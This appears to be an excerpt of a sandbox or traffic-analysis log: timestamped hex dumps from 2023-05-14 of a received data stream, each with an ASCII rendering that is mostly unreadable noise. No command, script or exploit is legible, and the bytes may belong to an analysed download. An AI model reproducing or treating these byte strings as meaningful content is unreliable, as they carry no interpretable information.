                            Data Ascii: 0w;RQ?P-nkbsbH^:Y91{yT@\" <S*H'cm%bwfePqj-FiFji,Bn#[LA*]}?\Bfv}ILXY2Aa_e1RtTb_j0ba=Z|G,I!lWOUmM#fu\'uI|:l_4|JU@\)
                            2023-05-14 02:51:07 UTC2142INData Raw: 83 c8 7c e1 bf 97 e6 8e fd bf 4c 34 65 c4 cb da a4 1a ff 9d e0 a4 35 35 e4 18 ed 28 92 cf 45 d0 79 29 cd 5e 48 9c 2e f4 a7 34 7b 33 6a 58 9b 49 9f b2 ff 95 f5 b3 14 4f e7 c1 3b bc 21 ec 4e 7d d7 f2 33 5d 9b 5d 01 a5 87 cf 26 13 98 bb 87 2d e9 80 f5 b8 bf 38 74 0d 2b 14 f6 47 a2 d6 65 74 85 34 a3 e6 ce 38 d7 28 b0 32 91 1f 5b 58 69 5a 96 de cf bd 22 e2 90 56 71 3c f8 8f 98 6e 4b 11 f2 30 08 ae e8 d8 4b f0 63 a2 d5 a7 12 34 77 ce 23 de ab 13 ed 72 fb 01 dd 93 28 ad a2 2f a7 51 ec 66 dc 47 e3 65 7f ee e9 ec 11 13 58 6b c3 7b 15 73 c0 9b 9e 80 e8 76 6d 18 90 1a bc f6 9c c6 18 4f 77 c8 08 c9 cc ca c9 ba e0 1d 4f be 26 e2 2b 4d 07 94 7f 48 f6 14 1d 9c 69 c9 e1 f0 a5 5b a3 f5 2e af 38 93 c0 8c 50 8f 45 12 d2 74 f7 3f 89 af 4f 97 22 61 8e bd 68 99 ac fe 23 33 c4
                            Data Ascii: |L4e55(Ey)^H.4{3jXIO;!N}3]]&-8t+Get48(2[XiZ"Vq<nK0Kc4w#r(/QfGeXk{svmOwO&+MHi[.8PEt?O"ah#3
                            2023-05-14 02:51:07 UTC2158INData Raw: 3a b9 ff 75 23 08 d2 c2 27 a8 5e 1d b0 2f b8 e1 74 7f ed 6d 6a f0 92 ec 75 00 ff 70 10 e8 45 86 fe a1 c8 01 5b 95 cc a8 47 9f 9f f5 de 10 c5 23 2a 03 8f 9f 02 4c d0 57 b5 02 ef 00 d3 5b f2 59 e2 2d ae 94 3c 94 5e ab a4 e2 59 6f eb 0d d4 80 55 77 0c 98 23 42 d3 85 36 8e d7 44 c5 27 54 2a 23 a5 e7 29 76 d8 94 86 5f ca 76 1a db bc c7 b2 4b 3c 3e cf 46 0b 85 5a 0f a2 bf 5e 33 c3 86 d3 34 3f 3d 9d 48 59 de 68 e7 d3 58 5d 6b 0a c6 1e f8 4b 07 56 fd cf 36 01 70 86 97 0e a0 dd f7 40 3f 7b ab 75 7c 15 53 14 0f 8f a4 90 c8 2c 80 57 bc ec a5 49 73 63 41 4a 78 b8 9c ec a2 37 7c a6 e3 99 fe aa da b5 44 76 cb 21 46 f3 8e 7b ff 8e 34 ec cd 16 90 06 d2 c5 15 25 93 16 66 17 44 20 0e 48 2e 22 6a f9 ec 58 7a 75 18 de 78 4c a2 73 24 7c e3 16 68 b2 55 ec 30 56 27 fc e1 e9 59
                            Data Ascii: :u#'^/tmjupE[G#*LW[Y-<^YoUw#B6D'T*#)v_vK<>FZ^34?=HYhX]kKV6p@?{u|S,WIscAJx7|Dv!F{4%fD H."jXzuxLs$|hU0V'Y
                            2023-05-14 02:51:07 UTC2174INData Raw: 22 e7 71 35 47 d9 d0 f4 f1 eb c2 ab 2a 26 df 35 0f 73 94 4e e4 93 ce 61 5d cc 7f 10 26 e5 71 0b 00 a2 2f 05 0b 18 d8 6d ed f7 5c f3 dd 6f 62 a3 61 8b d7 39 3a 41 b5 f2 77 81 b5 5c 89 87 da 15 a3 ec 6c a1 5b 75 82 c8 e4 2b 62 1a ca b7 0b f3 04 5f cd 80 f7 fe 81 25 a5 3d ff d2 a6 9b 4f 42 2a 19 3f dc cf 9b cb 62 93 cb 1c bf ea ed ed a6 6e 3d 26 71 4a a3 74 7b 70 92 ab 60 72 46 b4 54 28 53 45 b0 a0 d9 77 eb 3a c2 11 ab c3 13 76 e5 d6 01 c1 eb 69 ca 05 57 d9 77 3c 55 d7 dc 60 6e 72 09 38 27 4a 6b ec 7c cf e7 c9 5c eb 22 e6 b9 70 d7 fd 9a de 1a 26 71 85 68 99 60 3b e7 33 d6 5f 57 0b 8d 34 38 d6 a8 e3 e6 dc fc 87 7c c3 be 61 e5 52 97 e6 ca 25 14 9b 9a 74 46 50 1d 9b 46 d9 25 6f 70 43 7d 76 3e 31 84 98 37 38 51 a5 e4 04 ef 2e 9d 4a ea f2 19 95 a1 1f 4a fd e5 a1
                            Data Ascii: "q5G*&5sNa]&q/m\oba9:Aw\l[u+b_%=OB*?bn=&qJt{p`rFT(SEw:viWw<U`nr8'Jk|\"p&qh`;3_W48|aR%tFPF%opC}v>178Q.JJ
                            2023-05-14 02:51:07 UTC2190INData Raw: f4 a9 2e b5 a2 0e a3 73 a4 e2 9e 8d 0e 28 d0 07 e4 63 0f dc 7d af 82 59 48 e8 25 60 a4 b1 75 38 4e 8a 79 3b 81 8c c3 e8 c1 4a 6c 3f ba 11 fc b6 04 db 5d 5b ba 26 b7 86 c4 1c f7 f3 83 11 f7 35 13 c9 f1 fd 6c 98 d6 4b 95 d9 5c 1c 32 96 23 c2 33 f3 e5 b3 04 74 c6 01 3f 84 f9 7a a1 ba 9e fa a9 3b 7e e9 c7 92 b6 8e ba e3 18 cb 68 d3 ef eb e6 ce db d4 fc c1 74 7a 1b 9c 1f ec f1 83 44 d2 a9 79 c7 29 19 d0 75 6f dd e5 68 fe c2 3d ee f7 88 34 38 a2 0a ae bd a1 56 71 87 56 a5 44 10 56 a1 c9 28 47 51 04 e7 fc 2e 61 7b 1c fa 24 17 b7 55 47 1d 8a 69 6e c5 29 93 5d 7f e0 67 a2 74 4e 05 15 6f f9 d1 dc 8a 18 e9 0f 55 e3 77 ff 33 4e 5f 75 5d ac e8 1b 05 01 36 c5 bf 5d fc c5 86 a6 24 8b 3e c5 18 3f d7 6e e8 8f 61 4e 9a 4c f6 9d 20 9c db 5f 61 0b dd c9 f6 e9 67 91 35 ef f6
                            Data Ascii: .s(c}YH%`u8Ny;Jl?][&5lK\2#3t?z;~htzDy)uoh=48VqVDV(GQ.a{$UGin)]gtNoUw3N_u]6]$>?naNL _ag5
                            2023-05-14 02:51:07 UTC2206INData Raw: 12 2c 3e 97 f6 e1 7b 80 84 cb 29 00 77 4d b5 c3 2a cb 8f d1 48 e0 e7 7f 70 8c ed 79 61 17 24 ce bb cc 0f 44 81 fe 16 b3 d1 ea 6c ef 75 24 63 a7 f8 db cf 05 e2 e4 b5 32 55 9c f1 52 a0 f7 67 5e 22 b9 3f a5 a4 9d d4 c8 cf f3 6c d3 56 af fd ac 54 df 4f 1b fc e0 f1 e1 74 4c bc d0 a7 e5 d9 56 d6 49 af a6 08 4e d7 72 d3 fb 2c 0f 60 ac 61 87 65 c7 cb 9f 0a a0 f6 71 7c 88 8b 08 71 67 75 c7 67 0b 6f e7 d4 dc b2 ed f7 eb 29 79 4e 6f 51 eb 6e db e9 b4 68 a0 f9 df 5c 55 80 c1 a1 92 b6 49 94 6b bf ab 20 96 d8 65 70 ac 44 ff 50 72 2f b6 66 9d 7f d5 35 aa 7d b0 c7 db cc 90 f1 7d 77 22 af 71 71 a6 5c 49 cf 08 87 9f 69 17 66 4b cf 52 39 5e cc b1 c7 32 fb 35 70 0e fe 92 81 47 97 72 c4 96 80 cd ce 55 f2 aa 45 33 31 7a 6f 28 6b 8f 76 e3 98 17 dc c4 7e 87 3b af 9f 59 95 a3 f4
                            Data Ascii: ,>{)wM*Hpya$Dlu$c2URg^"?lVTOtLVINr,`aeq|qgugo)yNoQnh\UIk epDPr/f5}}w"qq\IifKR9^25pGrUE31zo(kv~;Y
                            2023-05-14 02:51:07 UTC2222INData Raw: 23 78 df b6 1b 49 90 6d cd fd b4 19 31 0c a4 80 4c d6 d1 85 6b 76 d1 ed 4d 1e cf 96 81 6a 43 1b 78 d9 3e 66 b6 4c 4f 5e 8f fc 68 24 59 cd a2 21 b6 b7 c5 a1 c8 6b 71 64 1c 58 be 62 d2 ff 47 d6 23 9b 78 46 09 bc 36 09 e4 cf ec 89 0e 3c 59 a3 11 65 62 b6 aa f4 d1 74 5d 17 21 97 98 d6 27 98 ab 86 96 d9 3c 1c fd 88 26 42 24 1f c9 1d 37 48 a7 ff 63 b5 7b 05 0f 5d 53 3c b1 9b 1d d9 4a 14 42 19 48 25 d0 23 bd 10 ff 7f 9c fc 41 e4 e3 b3 8e 2b 37 70 0b e7 68 fe 68 e2 f5 4b ab 03 11 42 65 9f 1c 59 10 81 40 bc 96 fb 53 e9 4b 9c a0 b3 82 6e 46 81 ec a6 61 9d 96 7b 32 cf a3 fe 64 0f 66 cc 7b ef 78 a8 57 2e ef d1 24 80 ef 17 e4 49 50 df 5b be 6c 7d 7c a6 f4 bc a7 4e f3 fb bd 54 14 08 22 f5 9e d1 be 94 ca 03 7a 18 a5 25 9c 28 f7 99 d3 dc e4 70 a3 32 29 cc 5f 4f 00 c1 84
                            Data Ascii: #xIm1LkvMjCx>fLO^h$Y!kqdXbG#xF6<Yebt]!'<&B$7Hc{]S<JBH%#A+7phhKBeY@SKnFa{2df{xW.$IP[l}|NT"z%(p2)_O
                            2023-05-14 02:51:07 UTC2238INData Raw: 31 55 f9 e1 0d 37 d3 89 ca b1 6e 2f 48 a5 29 3f 45 6d c7 c2 48 c2 82 f4 28 d6 eb b4 b8 76 31 be 01 22 44 e7 2b 68 fe 1a d3 f1 79 e6 f9 84 2b 97 10 1f 63 1e c6 b0 10 3a d7 15 1f 99 6b fe 07 3a ca 51 7c ea 09 9d ee 9e c8 9b ec fa a3 68 87 a4 06 c5 0f 2f 95 22 b4 59 f2 b4 db 7f 11 e0 fd fc de 30 2f ad 72 f9 d6 80 61 16 e8 03 5a a4 7b c6 6f 5a a5 74 19 60 a5 cd f7 dd 3d 88 b6 d8 b7 cf e2 a8 6f 9d bd 3d f6 cb 2d 06 14 1f 30 88 ec bf 82 2b f3 9d f4 23 32 5d 47 16 b1 4e d5 d1 90 11 b3 ba 66 e5 05 71 d6 0b e5 b3 67 a2 a0 49 4a 92 78 d1 c4 2d e6 7d d1 f1 45 c2 f7 7d a6 67 14 9f a2 ca d3 f9 be 81 e5 fb e6 76 fd 13 7c 9f c9 9c 24 ce 4b 9f 89 ee f1 6a 45 1a 0c 57 24 a3 b2 63 e2 c7 18 c5 0a 06 46 44 0d 11 0a 4f 54 2e ec bf 35 58 7e 8d b4 a2 e4 12 34 ae 3a 9b 00 2f 11
                            Data Ascii: 1U7n/H)?EmH(v1"D+hy+c:k:Q|h/"Y0/raZ{oZt`=o=-0+#2]GNfqgIJx-}E}gv|$KjEW$cFDOT.5X~4:/
                            2023-05-14 02:51:07 UTC2254INData Raw: 26 31 d3 0d 3b 09 ea e8 e0 55 ec 54 62 ac 65 ad be 97 62 fc 8d 22 ef 0b 76 97 b2 59 a0 f6 14 14 20 62 4b ab 73 2b 07 09 15 23 3a 5f b0 2e db b9 90 d6 45 f3 5e a5 ad f8 76 34 6c de b1 57 4e 77 3c 15 7e 83 47 50 d5 7d 25 e9 d9 bc 19 cc 22 36 66 49 a3 a5 66 4b f5 51 95 94 ff b0 04 54 5c 46 e8 58 6f ed c6 98 57 77 7b a2 d6 9d 3a 2c 29 da 74 db 98 f7 40 f0 1d dc 3b ac 4c 50 f1 cf f1 d4 c2 db 37 c6 0c ba 7e d8 c5 af 2d 06 af 23 fe 1a 65 ea ef 19 6d 07 ea e8 fc be 3d 74 e3 e5 0b a2 76 90 5c 64 ba 1f 35 48 ef e5 48 26 e8 6c 73 20 54 63 ce dc c5 a3 f3 ed 77 ae a7 50 c2 d4 75 53 3e c9 6c d1 55 bd dd ea 24 e8 6c 2d b6 ee 82 af 35 7d 8b fd 98 ae 76 99 17 d8 ab 5f c3 75 80 df 67 b1 af bc a0 4a 39 17 da e3 84 ad df 39 e5 a1 21 7e b0 e3 a2 aa e4 f3 9b 40 d3 ac a1 d3 a1
                            Data Ascii: &1;UTbeb"vY bKs+#:_.E^v4lWNw<~GP}%"6fIfKQT\FXoWw{:,)t@;LP7~-#em=tv\d5HH&ls TcwPuS>lU$l-5}v_ugJ99!~@
                            2023-05-14 02:51:07 UTC2270INData Raw: 3a ef 7c 67 4a b7 d6 ee 66 b3 0d 88 1f 85 f3 62 60 fb 01 9d b7 8c 7d 48 52 da c7 6c bd e7 ce 51 26 b8 09 35 2c 89 29 e8 4d 73 f4 3b 33 48 e0 ea 45 a4 ba c1 e0 ac fd 57 b4 23 b5 f7 a1 d7 d0 a6 86 27 1b b2 a0 67 15 90 74 c7 fd d2 5a 2d f3 97 56 cd ef 80 ab b0 f2 75 80 9d 1f f2 2f a3 d7 4d 7a ca 64 34 06 e4 42 7e 62 1d af 1f dd 84 3b 99 ed 0f ea 85 7f a0 a5 5d f0 d1 bb b3 de 97 7c f1 e7 f6 75 9a 4d 95 5a 4c 0b a2 cd ca 5b 27 9b 89 4c e6 0f 1e a8 76 f5 3f 8b 7d 4e 20 21 56 f1 55 e0 6a ef 09 06 16 a9 7d 03 e3 d8 3c 6b 88 97 87 95 21 e2 9d a2 9b 7e bf c4 b4 a5 05 c9 34 eb d8 26 6f 7f 4a 00 05 c1 28 1f 5f ec 18 3d 2a a8 a9 d1 5f c8 bb 61 7a ee 22 5f 72 bb 6e 9a 1a 8a 8b e1 ff 7e 7d 68 e9 d5 be b6 77 ed 79 37 6f ea be c4 7e a4 8a ba 64 3d a5 6f 04 fd 51 21 92 9b
                            Data Ascii: :|gJfb`}HRlQ&5,)Ms;3HEW#'gtZ-Vu/Mzd4B~b;]|uMZL['Lv?}N !VUj}<k!~4&oJ(_=*_az"_rn~}hwy7o~d=oQ!
                            2023-05-14 02:51:07 UTC2286INData Raw: 42 3a 9f 23 72 9b 74 41 57 e7 e7 b9 2d 3d 13 c9 10 93 d7 55 4f 90 8c 7c 42 bc 7f 64 d1 77 78 66 b4 6d ae e4 f0 c8 04 79 63 c8 3c 1b 6d d6 c1 9b b4 77 dc b8 22 c0 c8 61 71 a0 97 14 b1 b1 f4 16 2d 28 7d b5 50 bb d2 6e f9 91 86 53 62 2e ab ec e2 ed c0 97 43 6f ab 55 a4 11 cb 96 e0 e3 94 c7 c4 08 5e 48 48 98 10 6e 37 05 2d be 8d 9c e3 61 11 5f eb 87 10 f1 f6 a7 fc 96 97 d1 f1 f8 71 40 3c 5d ed b8 55 19 17 12 f6 1e 43 27 0b fa e2 e0 64 d3 ae 98 9e 20 25 69 75 8c ca 12 23 09 11 40 a3 5c 5b 28 70 b7 67 2a f9 5c 64 17 1f 48 a5 eb e4 58 e6 d1 6c f8 e7 4d 67 c1 9e 51 bc ee ff 56 38 46 7f 4e 49 38 bb 96 19 1e 37 2b 0a 3d 17 28 67 c1 db f7 ec d0 3f 56 7a 17 2b c9 d4 bf 44 36 63 7b 93 b5 98 c0 e1 60 b8 63 6b 9a 54 ab 43 13 e3 df 4e a7 f8 f6 2c 31 e3 bd 22 66 5f a6 bf
                            Data Ascii: B:#rtAW-=UO|Bdwxfmyc<mw"aq-(}PnSb.CoU^HHn7-a_q@<]UC'd %iu#@\[(pg*\dHXlMgQV8FNI87+=(g?Vz+D6c{`ckTCN,1"f_
                            2023-05-14 02:51:07 UTC2302INData Raw: 36 a7 1b b5 f2 90 55 98 e2 9a 1c b7 75 6c 69 82 6a 4f 17 85 db 24 d4 7d 6e bf 39 28 57 c8 28 c5 67 13 1c 9e c6 0c 54 a5 d7 62 ac 47 66 b7 80 32 ef d4 cc d4 f4 6c 47 53 f2 5e 3c 0b 72 86 6a 97 40 69 e2 cb b9 90 75 d0 fb 05 ee 7d fe 79 a7 25 eb 25 5f 80 3e e7 e5 00 d3 1f b9 d5 c5 62 46 72 e3 bb 72 7d 41 55 00 fb 82 ec 02 5a 61 de 03 76 51 ec cc 31 e9 f1 f5 b0 b5 26 03 21 ab 24 a2 5a 4c 79 6b a8 3d 18 c7 59 e9 fa 6c 0f 69 c7 23 a7 65 db 49 5d 5d a5 36 b2 74 0c a5 96 c1 13 34 44 6a b5 7a ac 48 17 57 48 6f 42 3d 2e 4c 68 ad 23 11 e8 2e 8c 6c e6 95 e8 ff 3c 6e 4b 7f f5 34 4a 3a 48 9b 64 40 95 6e fb 3c 4f 6c 9a 08 29 29 8c 7c 26 be f5 ef 63 43 36 98 5c db 41 ae 75 a5 bf 02 ed 06 96 40 c4 0e 7a 86 29 3c 05 93 3f 2b 23 f5 4d 23 95 dc 67 72 6c 3d 93 d3 71 80 47 5f
                            Data Ascii: 6UulijO$}n9(W(gTbGf2lGS^<rj@iu}y%%_>bFrr}AUZavQ1&!$ZLyk=Yli#eI]]6t4DjzHWHoB=.Lh#.l<nK4J:Hd@n<Ol))|&cC6\Au@z)<?+#M#grl=qG_
                            2023-05-14 02:51:07 UTC2318INData Raw: 8c 54 be bb 40 d3 da f3 67 0d 64 d3 7c d9 e8 55 7a 21 7d dc 0d de c1 4f 6f f1 66 53 82 1d e7 79 59 29 3b 7c c6 e5 a2 32 0b 33 3b 18 c5 f8 86 36 e1 fa 97 eb 86 90 21 f1 06 0f 12 c6 c4 85 fc 1c 7a 6f af 58 c6 e0 76 00 37 71 0e 1e 8e 2e 67 93 ac 5c 16 4c e8 00 f7 49 ce 98 8d 63 aa 86 d7 0e 1e be be 97 3c 92 82 2e b4 82 50 f1 6b b4 92 ac 84 53 b4 9d e2 72 b0 09 3d bc aa 2e 61 2c c4 17 dd 55 ab ac f9 da 8f f5 69 6f 6b d3 7c 10 83 fa ae bf b5 4b c7 fe 3a 75 02 1c bb 40 0b bf 21 fa 23 80 dd e5 c8 3a 5d 00 f3 d8 7a 9b 73 da 6b 8f b6 08 ab ec 4a 79 e4 7d f4 9d 2e 34 b1 dc 70 1b 28 48 8c 26 0a d0 f5 7e 5a 60 08 57 d8 e4 a3 ad 7e f7 25 ad fa 32 7d b7 bb 9c a1 e0 e7 a8 81 39 3a db 3e 60 40 bd 0f b9 6a ec 14 97 9d 64 65 08 07 5f 48 1c d0 89 56 04 31 2c 5e 8f 82 19 26
                            Data Ascii: T@gd|Uz!}OofSyY);|23;6!zoXv7q.g\LIc<.PkSr=.a,Uiok|K:u@!#:]zskJy}.4p(H&~Z`W~%2}9:>`@jde_HV1,^&
                            2023-05-14 02:51:07 UTC2334INData Raw: f5 30 cf 8d f2 61 92 a7 37 ba b6 32 09 fc 00 b3 6b c9 82 fe 58 08 86 e5 f2 5d 28 6d bf 1d 94 0f 12 3c 7b 75 8d a2 cf 4a 26 5b 6a 6c b0 ae e2 63 24 d1 cc c0 e0 03 95 ad 7b 8a 7f ea 0c 77 c4 91 2e 89 1b 62 af 19 fd 80 a3 c3 ce 1d f1 1d c3 5d 90 cf 8e 19 ff 3e da 15 8b 4a 72 10 93 0f 63 82 32 51 f1 ee 9f 87 0f 6d 7a e5 aa 9f 96 23 4a 62 fb ee cf e7 3c a9 dd 47 d6 01 8e 70 5a f3 65 1f a6 5f e5 8d 28 63 5a 69 9f eb f3 e2 76 2e 16 21 48 65 81 34 aa ef 7f 97 14 d6 c0 36 47 66 bf 56 7f ca 0e 30 0b 8e 4a e7 ca 0a 54 87 e4 7a 24 b5 f5 a7 ca fc 21 81 67 fd 79 95 87 ed 42 2a 2d 02 af 80 5d ca 9b 4d 33 6a ef b1 6c 3f 1b 2d 0f ca 4f 6d 4e c1 7a a0 11 96 e0 bc 2d d8 b5 2e 34 55 54 8d ec 86 29 de e0 51 d1 61 58 1d 88 a7 a4 a2 5f d9 ae 2c a8 b2 72 51 21 99 3c 90 90 07 b5
                            Data Ascii: 0a72kX](m<{uJ&[jlc${w.b]>Jrc2Qmz#Jb<GpZe_(cZiv.!He46GfV0JTz$!gyB*-]M3jl?-OmNz-.4UT)QaX_,rQ!<
                            2023-05-14 02:51:07 UTC2350INData Raw: 4f b5 73 ed 3a 93 9d 9a a7 f3 56 9e 8b fc 5f e0 64 37 80 1c e3 ef fd c8 72 e0 c6 50 22 a2 b9 f0 83 0a 6a 05 46 01 93 ad 96 cd 14 6f e1 ed 83 b9 6d 57 09 40 ae b0 b3 f4 d5 d9 b5 c2 86 cf 70 b7 ac 4b 6e 27 48 9b 21 49 2f c1 06 5e 6a cd ec f1 74 df 0d 1d ee f8 b6 27 4e 95 3d ed c2 e5 6a 46 f8 68 cf 5f 4b c6 c6 2b f7 a3 7a 37 16 34 f2 d7 62 e3 2f 88 85 71 86 0c 71 3e 93 62 4f 68 14 68 20 b7 5f 99 50 6d 8d 14 23 79 68 cb 29 36 8b 35 a4 3d 7b 99 66 41 96 25 41 3e 67 d0 a8 e0 31 a2 33 58 39 21 d5 08 18 14 c7 e7 5c 1d aa 75 f2 95 60 2b da 2c bc e4 f5 74 00 d9 87 54 3e b0 70 29 32 af 53 50 5d 28 75 6b 84 08 06 99 21 04 31 c2 a4 5b ec 97 fa 6d 75 6e b7 92 9d 87 71 b2 55 5c 52 c1 2d fd 66 d4 9c 58 e9 13 2d 6a ed 23 33 12 44 05 9d 1f 95 77 e7 48 65 10 ff 70 c3 ad 7d
                            Data Ascii: Os:V_d7rP"jFomW@pKn'H!I/^jt'N=jFh_K+z74b/qq>bOhh _Pm#yh)65={fA%A>g13X9!\u`+,tT>p)2SP](uk!1[munqU\R-fX-j#3DwHep}
                            2023-05-14 02:51:07 UTC2366INData Raw: 05 8f c6 13 54 75 d1 08 0f 55 b8 10 fc 2b 1a bb 4f 9b d1 51 a0 de 32 3f e5 81 46 17 5b 9f 14 9d 28 88 2f 88 f6 a5 6e ad 8f 8c 74 d3 2a 6f ae 06 b3 bf fe ed 86 4b 65 70 e0 96 ce 36 a2 93 a8 b5 48 21 7c 8d 17 9e ec 77 fd e6 2d d8 29 ac fe af e4 2d 96 e5 aa f8 83 15 45 9f b3 7c 1b f9 79 57 80 a4 1f 96 6c f8 dc 05 5c df 6c f6 89 2d 33 aa fe ff 4b 9a 20 c3 c9 81 85 8c f4 dd 42 b6 1e 4a 95 1b dc 6a 31 b2 e3 5f 84 cf e4 6e 3c b8 f2 61 7a cf dd 97 3e 9b 1d 52 b5 9a 7e 97 c0 7b 8c d4 67 9b de 2e c8 2f fe 7a 0d 6a 7f 9f 72 54 53 e9 3c bd be 9d fc eb 3e 5d 7a 3c ef da 70 a2 16 bf 8b 69 b3 87 21 96 ba 19 66 85 3c 89 ea ec 3a a0 04 a4 7f d7 11 b0 5e 11 71 ba 95 a1 c1 36 40 22 c7 fd fc 04 78 e5 ae 30 8f c6 32 55 41 05 1e a3 f7 9a 46 ad e1 bb c5 e9 1f 15 9f d1 31 6c 66
                            Data Ascii: TuU+OQ2?F[(/nt*oKep6H!|w-)-E|yWl\l-3K BJj1_n<az>R~{g./zjrTS<>]z<pi!f<:^q6@"x02UAF1lf
                            2023-05-14 02:51:07 UTC2382INData Raw: 03 81 10 55 4b 59 d4 45 16 63 1c 1b f2 28 56 8e 3e e9 c7 02 61 e7 71 b6 ed 96 3d 4b 4f 8a 0d 47 42 e9 5c b5 39 eb d2 f0 b7 f8 9c 2f 22 40 21 a0 e8 8b ce db e9 c0 5c 15 4d 81 ec f0 8d 25 a3 32 b3 0b a7 ad b6 ad bf 2c c7 d9 0c 17 bb 3a ca a8 70 e1 fd 59 13 eb 1f dd f9 bf ed d1 65 e6 66 d4 21 45 6f f9 c1 1d 27 f9 6a e0 3b 1c 0b bd 51 c3 8d e7 c3 57 ad 00 f4 54 85 cd 82 5a a8 27 4b 1e 22 51 0a 87 74 21 f3 45 77 d1 6c 1f 6c 2c eb bf 15 dd 47 e8 fb e6 10 46 25 1b fc f0 46 d6 75 62 98 55 6c e5 58 45 06 7c a5 9d cf 13 b7 23 4a 93 be 3f 60 aa eb e4 4f 6a 21 6a 42 7b f3 2f 6a cb 28 c2 e5 c2 d3 b9 f2 79 f6 82 64 c9 67 a8 a2 92 b2 db eb 16 3a a3 01 36 d2 fd eb 59 81 e7 51 53 62 78 b9 7b 20 99 cc 55 e1 cf 6c 4d 48 a8 31 a3 40 5d 8c 7d 75 91 cc 67 0b 1a fc 10 6e 42 a0
                            Data Ascii: UKYEc(V>aq=KOGB\9/"@!\M%2,:pYef!Eo'j;QWTZ'K"Qt!Ewll,GF%FubUlXE|#J?`Oj!jB{/j(ydg:6YQSbx{ UlMH1@]}ugnB
                            2023-05-14 02:51:07 UTC2398INData Raw: 6b 78 35 ed c2 c8 94 3a 6b f1 fe 45 fe bc 57 01 60 79 d8 b8 ce 05 dd b4 79 b8 c8 23 af e7 a4 59 26 c9 3e 3d 4b bd d4 69 07 f2 64 1f ff 6c e3 6f 60 dd 4f fa ca 60 f6 51 55 55 96 f9 01 e0 fd 52 31 79 66 b6 d0 fb 14 ea e0 f5 49 1d 76 6d a1 b8 28 25 31 98 2b cd b7 55 cb 98 78 54 7a ba 44 7e 55 ad 7f a5 a2 d1 96 ba cf f1 c4 61 95 85 e6 eb 33 95 bf 0d 79 20 f3 55 68 b1 ff c7 67 96 7d d3 29 4d 71 2d 81 99 b6 81 05 e9 34 47 aa 30 eb d8 e5 57 8c 9a ea d4 a1 fa 37 06 3c 45 bd 15 76 41 22 89 2e f2 08 02 65 b9 31 a3 9e 33 a1 8b 6e 2d 87 89 2d 0c ea 66 75 75 b1 9b e6 51 81 92 cc 8e 01 cb f3 85 f0 a9 ea f8 32 6a 9e ff 7c 3d 87 a1 16 92 87 84 6f 27 17 9c 63 0a 26 4d e0 25 38 f4 eb 08 79 05 fb 6b e4 70 a7 7a 42 6f 4f 2c c9 af 04 7b 4f 6f 0d 78 bc c1 7e 6b 05 d1 13 e7 b8
                            Data Ascii: kx5:kEW`yy#Y&>=Kidlo`O`QUUR1yfIvm(%1+UxTzD~Ua3y Uhg})Mq-4G0W7<EvA".e13n--fuuQ2j|=o'c&M%8ykpzBoO,{Oox~k
                            2023-05-14 02:51:07 UTC2414INData Raw: 68 47 79 17 71 c9 35 ce 9f 93 47 26 82 38 e3 49 68 46 ce 21 f6 e9 f6 34 72 42 b3 30 a0 7a f3 b7 2a 26 6f a5 f8 39 be 0d e7 e6 ea 64 aa 36 d4 c0 40 df 26 af 22 a7 6e 0c 34 b2 07 72 9d 2f d3 c0 42 18 31 69 61 f8 ae f0 f9 ad 6c 40 02 fd 22 85 3c 6b b3 7f 61 da e5 94 51 a4 e8 41 7d 67 32 c5 62 cb 1f 11 e6 dd 86 11 95 33 e1 3c 40 67 f3 f2 b4 b9 87 8f 2e e0 fe 17 21 9e a9 c0 ad f5 f2 26 68 4e fc 7e 14 13 67 62 35 e6 e2 03 90 d2 2e 33 7a 2e 87 13 a3 1c 74 72 d5 ff ad 60 e4 e6 6f 40 03 c4 f9 a1 57 33 d7 1d c1 df dc 1a 8e f3 dc 47 65 4b 09 86 e2 c5 66 69 f7 3c 28 c0 a4 e5 74 3a 8a ca ed 1e 34 3a da 03 25 fb 08 94 c9 21 ab 47 60 3e 8a 19 79 e0 d9 fb 6a be b7 51 87 6a cc d4 ab fa 17 8e 24 bc a5 58 c3 ba 58 f1 c1 2f 0e 18 5e 3b 94 99 eb bd 44 f8 a5 44 8b 6a bd 8a 42
                            Data Ascii: hGyq5G&8IhF!4rB0z*&o9d6@&"n4r/B1ial@"<kaQA}g2b3<@g.!&hN~gb5.3z.tr`o@W3GeKfi<(t:4:%!G`>yjQj$XX/^;DDjB
                            2023-05-14 02:51:07 UTC2430INData Raw: 02 be f5 a5 d4 9a b1 c5 ef fd bb dc 78 95 44 b3 26 d2 13 dc e2 c4 ac 31 f4 b8 e7 c8 40 ba b2 c3 e7 39 ca 89 47 ff f6 4f ef 2e 23 09 13 65 af 62 ed 57 e7 51 2d c8 91 7a 73 81 b7 48 04 6e 37 e7 8c e7 f4 7b 54 d9 d7 ce 6f 83 5a 3f 31 58 c3 96 b8 df 3b 77 d6 b9 81 f0 55 44 e3 23 2f e3 69 44 a3 a1 97 22 2c cd 94 ea 94 82 e2 1d 36 5e 26 86 95 68 81 9c 44 58 a5 56 91 e6 1c 60 99 4a 74 30 3c 59 76 2b 1e 9d 52 cf 46 3d ea 55 fa a4 ea 88 7c 20 45 9a a6 d8 22 35 e5 dd 81 50 e3 97 7d 0f 44 e9 37 26 b2 9c 66 5b 43 b2 f1 60 d7 8f 77 e3 6e 09 db 50 6e 77 fb e7 6b e4 e6 70 f9 6e 55 5f 82 ca 9a b1 7a 14 90 17 ef 61 ff 2c a2 71 63 99 b0 4f e3 83 2c 90 6f 85 3d 93 1c 59 f2 10 20 cc d2 19 6f c2 34 92 14 3d 7f 27 9e 0e 9e 6c af 22 91 df 95 6c bd f6 3c f4 7d 72 55 00 c9 f1 74
                            Data Ascii: xD&1@9GO.#ebWQ-zsHn7{ToZ?1X;wUD#/iD",6^&hDXV`Jt0<Yv+RF=U| E"5P}D7&f[C`wnPnwkpnU_za,qcO,o=Y o4='l"l<}rUt
